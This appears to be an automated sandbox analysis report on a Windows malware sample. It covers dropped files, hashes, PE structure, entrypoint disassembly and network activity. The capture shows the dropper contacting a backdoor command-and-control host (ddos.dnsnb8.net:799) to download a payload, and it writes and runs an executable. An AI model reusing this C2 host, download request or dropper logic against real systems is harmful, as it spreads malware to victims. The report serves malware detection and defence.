Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	4.485900440301002
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgJg77aI9zUf7WpW8VYDYm8M4JPHF8+q8vBFbM2UUjEOkd:uIjfmI7CC7V7JyK3bM2UUjEOkd
MD5:	CC3E80983422E31E3637B8039A880C27
SHA1:	B2D8320C867CB39D73C473920A1548F8A8EC2DB1
SHA-256:	23065C7551B779A0AD50E96096439E1BEF81959ED296E0E3F850BFB1A697A053
SHA-512:	AAA96FCDA024E3A81E92A00D710289A2C6FC2B699B59FEC3AAADC276EC82BB310A1CAFB55D88CC859F1BDE5FECDEB6B1648BB3D1D9ED08620C15C1C208C732D1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="443616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\2E8258C9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\oQmD.exe

Download File

Process:	C:\Users\user\Desktop\1hdqYXYJkr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 93%, Browse
Joe Sandbox View:	Filename: 7Y18r(193).exe, Detection: malicious, Browse Filename: 7Y18r(212).exe, Detection: malicious, Browse Filename: 7Y18r(216).exe.dll, Detection: malicious, Browse Filename: 7Y18r(223).exe, Detection: malicious, Browse Filename: builder_Release.exe, Detection: malicious, Browse Filename: A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe, Detection: malicious, Browse Filename: BOTBINARY.EXE.exe, Detection: malicious, Browse Filename: BkPack.exe, Detection: malicious, Browse Filename: bss.exe, Detection: malicious, Browse Filename: C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4681984526239775
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4sWSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSb7g:zXD94sWlLZMM6YFHr+7g
MD5:	AF4ECC361BB1FB6BFB8BB4A8D19B03DD
SHA1:	8BDBC74481C7A43E9C4570E9F0A2628ABE247959
SHA-256:	A392B11388A4E3DD505DAB63A786F90E06ABA6875CA6A7B2FCA5AB6753B31828
SHA-512:	95D49FAC22B3890D85B9444EF5A9D236C9A6214E4B4C568EBEC04C1A182FCC5C20F794E29349CDFBB925C0D4E04A7ACB3F9D78CE3FF2CAE7CE34CCFCACF6D954
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.2.!............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.831238281051393
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.91% Win32 Executable (generic) a (10002005/4) 49.86% InstallShield setup (43055/19) 0.21% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	1hdqYXYJkr.exe
File size:	741'539 bytes
MD5:	ac5a278467c279e653f34a552dd7170c
SHA1:	1a13f3fb4b8c19478204e19126dbd8d2f81cfdbe
SHA256:	08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5
SHA512:	16ef7752ac0e7786696149d589b412af600599c84615e8a70561dba87ba50af85780b42d8328bc478ed2f2dca7a1e87925de97847d52d7bb9d50b5d98028ca62
SSDEEP:	12288:jW3KnxvU+WZm6KGMYBFzQAyz8mFu1vdTXPMp1N6Gx:iQG8LjYC8mQ19/Wh
TLSH:	29F46CF0E7C8CB72C69F0B3510715E68462AFE7C49A1EB2F154D35BD6E3A344825922B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wq..."..."..."]..#..."]..#'.."]..#..."LE.#..."]..#..."..."..."LE.#..."LE.#..."}F.#..."}F.#..."Rich..."................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x141f000
Entrypoint Section:	k)u
Digitally signed:	false
Imagebase:	0x1370000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A02999 [Tue Jul 23 22:07:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	44bf580ed80314abe1c845a9a625d03b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 446D516Fh
mov dword ptr [ebp-44h], 6578652Eh
mov dword ptr [ebp-40h], 00000000h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F75D8710D65h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF5985Ah
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F75D8710EAEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F75D8710DB4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F75D8710DABh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb4000	0x1020	k)u
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xad000	0x1f94	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x273a8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x27400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x272e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x20000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1f000	0x1f000	6f28c346cb1fee1e706670ed6ef7ab56	False	0.5767940398185484	data	6.59953210814888	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x20000	0xb000	0xb000	99d16aeb54f4bd041e86691b4cca2a29	False	0.3690740411931818	data	4.658740732252244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x81000	0x81000	d23908f26c1efedd958eab5f98e40a69	False	0.5113232043362403	data	6.90151184862656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bsS	0xac000	0x1000	0x1000	53bc81b388800907fe32b0944a1c8bf8	False	0.182373046875	data	2.17167838585446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xad000	0x2000	0x2000	c4befdd17cfc9b5c4833bb93b1955eda	False	0.7506103515625	data	6.525813767751678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
k)u	0xaf000	0x60a3	0x60a3	63eef293fdf9fed25dbfb06966e236bf	False	0.5931120902219168	data	5.793412256128098	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetCPInfo, CreateFileW, WaitForSingleObject, CreateThread, VirtualAllocEx, FreeConsole, RaiseException
KERNELBASE.dll	InitOnceBeginInitialize, InitOnceComplete
kernel32.dll	CloseHandle, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WakeAllConditionVariable
KERNELBASE.dll	SleepConditionVariableSRW
kernel32.dll	GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, WriteConsoleW, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, HeapSize, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle
user32.dll	OffsetRect
kernel32.dll	GetCurrentPackageId, GetSystemTimePreciseAsFileTime

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-06T12:33:52.850053+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	65342	53	192.168.2.4	1.1.1.1
2024-08-06T12:33:53.346605+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.4	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2024 12:33:52.956944942 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:52.962110996 CEST	799	49730	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:52.962198019 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:52.964207888 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:52.969118118 CEST	799	49730	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:53.346537113 CEST	799	49730	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:53.346605062 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:53.346694946 CEST	799	49730	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:53.346782923 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:53.347749949 CEST	49730	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:53.352586985 CEST	799	49730	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:57.749131918 CEST	49736	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:57.753968954 CEST	799	49736	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:57.754069090 CEST	49736	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:58.328504086 CEST	799	49736	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:58.328573942 CEST	799	49736	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:58.328592062 CEST	49736	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:58.328608990 CEST	799	49736	44.221.84.105	192.168.2.4
Aug 6, 2024 12:33:58.328624010 CEST	49736	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:33:58.328651905 CEST	49736	799	192.168.2.4	44.221.84.105
Aug 6, 2024 12:34:14.197254896 CEST	49736	799	192.168.2.4	44.221.84.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2024 12:33:52.850053072 CEST	65342	53	192.168.2.4	1.1.1.1
Aug 6, 2024 12:33:52.947223902 CEST	53	65342	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 6, 2024 12:33:52.850053072 CEST	192.168.2.4	1.1.1.1	0x9afc	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 6, 2024 12:33:52.947223902 CEST	1.1.1.1	192.168.2.4	0x9afc	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	6316	C:\Users\user\AppData\Local\Temp\oQmD.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 12:33:52.964207888 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	06:33:51
Start date:	06/08/2024
Path:	C:\Users\user\Desktop\1hdqYXYJkr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1hdqYXYJkr.exe"
Imagebase:	0x950000
File size:	741'539 bytes
MD5 hash:	AC5A278467C279E653F34A552DD7170C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:33:51
Start date:	06/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:33:51
Start date:	06/08/2024
Path:	C:\Users\user\AppData\Local\Temp\oQmD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\oQmD.exe
Imagebase:	0x800000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 93%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:33:51
Start date:	06/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312
Imagebase:	0x7ff7699e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:33:56
Start date:	06/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412
Imagebase:	0xf80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	1000
Total number of Limit Nodes:	2

Executed Functions

Function 009FF044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 009FF223
WriteFile.KERNELBASE(00000000,FFF5985A,00003E00,?,00000000), ref: 009FF252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 009FF256
WinExec.KERNEL32(?,00000005), ref: 009FF262

Strings

lstr, xrefs: 009FF1A7
el32, xrefs: 009FF0FB
GetT, xrefs: 009FF188
WinE, xrefs: 009FF110
oQmD.exe, xrefs: 009FF1FD, 009FF200
.dll, xrefs: 009FF102
Writ, xrefs: 009FF148
Crea, xrefs: 009FF169
GetM, xrefs: 009FF0B6
Clos, xrefs: 009FF129
odul, xrefs: 009FF22D
dleA, xrefs: 009FF0D0
athA, xrefs: 009FF199
Kern, xrefs: 009FF0F4
catA, xrefs: 009FF1AF

Memory Dump Source

Source File: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$oQmD.exe$odul
API String ID: 2234911746-2449759314
Opcode ID: 3a21b9a04b60c029bfa5898a0c68380fe995c34265fb90ba904242a9be045170
Instruction ID: 9288f5f84124e37a0c429c9c19ddedc641de2a24f1cf795c7b883634ec9ac283
Opcode Fuzzy Hash: 3a21b9a04b60c029bfa5898a0c68380fe995c34265fb90ba904242a9be045170
Instruction Fuzzy Hash: AF613A75E05219DBCF24CF94C8A4ABDF7B8BF44315F2585BAD605AB201C3749E81CB91

Non-executed Functions

Function 0096BAC7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,0096BDE5,00000002,00000000,?,?,?,0096BDE5,?,00000000), ref: 0096BB60
GetLocaleInfoW.KERNEL32(00000000,20001004,0096BDE5,00000002,00000000,?,?,?,0096BDE5,?,00000000), ref: 0096BB89
GetACP.KERNEL32(?,?,0096BDE5,?,00000000), ref: 0096BB9E

Strings

ACP, xrefs: 0096BAE5
OCP, xrefs: 0096BB1B

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 43551ec02b640017b934d4bbe613df2ba6b4dd46b4af1e814ac9b4110527fe18
Instruction ID: 766658cfd1c9a494a08a1e1935b19adff5919f5d770ab4c09448776cd2992309
Opcode Fuzzy Hash: 43551ec02b640017b934d4bbe613df2ba6b4dd46b4af1e814ac9b4110527fe18
Instruction Fuzzy Hash: FC215E32B14101EADB348F75C941BABB3AAEF95B64B568464E90AD711CF732DEC0D350

Function 0096BC9C Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0096BDA8
IsValidCodePage.KERNEL32(00000000), ref: 0096BDF1
IsValidLocale.KERNEL32(?,00000001), ref: 0096BE00
